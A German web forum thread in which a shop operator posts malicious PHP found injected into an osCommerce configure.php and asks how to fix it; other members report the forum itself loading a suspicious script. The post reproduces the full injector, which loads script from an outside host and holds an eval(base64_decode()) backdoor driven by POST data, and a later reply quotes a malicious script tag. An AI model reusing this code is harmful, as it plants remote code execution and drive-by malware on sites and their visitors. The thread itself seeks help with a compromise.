Sicherheitslücke CMS

albi123

Gesperrter Benutzer
7. Dezember 2009
644
69
Hallo,

folgenden Code fand ich in meiner configure.php:

PHP:
$sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11″; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102″; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie=’”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie=’”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–”; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Mein Provider meint dazu:
Genau in dieser Zeit gibt es auch viele Häcker die Sicherheitslücken auf einem CMS finden.


Ist diese Sicherheitslücke schon bekannt und wie schließe ich sie?


Gruß

PS: sorry, bitte in die richtige "Abteilung" verschieben.
 

albi123

Gesperrter Benutzer
7. Dezember 2009
644
69
AW: Sicherheitslücke CMS

ohje,

hast recht, falscher Shop. War ein OSCommerce.

Am besten komplett löschen den Beitrag.

Gruß
 

ag-websolutions.de

Sehr aktives Mitglied
29. Dezember 2009
14.548
232
AW: Sicherheitslücke CMS

*pruuuuuuuuuuuuuuuuuuuuuuuuuust*

sorry....ne lass mal stehen damit andere wissen welche shop-systeme anfällig sind....und welche nicht ;)
 

okh

Gut bekanntes Mitglied
20. Oktober 2007
585
4
Buchholz
AW: Sicherheitslücke CMS

*pruuuuuuuuuuuuuuuuuuuuuuuuuust*

sorry....ne lass mal stehen damit andere wissen welche shop-systeme anfällig sind....und welche nicht ;)

auch interessant was hier so im Forum an js rumgeistert. Mein Kaspersky Protokoll schlägt bei jedem Seitenaufruf an.

Code:
<script type="text/javascript" src="[URL="http://forum.jtl-software.de/view-source:http://kokosina.in/1"]http://kokosina.in/1[/URL]"></script>
 

rbaier

Gut bekanntes Mitglied
28. September 2008
227
1
AW: Sicherheitslücke CMS

Ich befürchte auch, hier sollte etwas getan werden - dieses Forum wurde offenbar kompromittiert (Blackhole Exploit Kit).

--
mfg
rbaier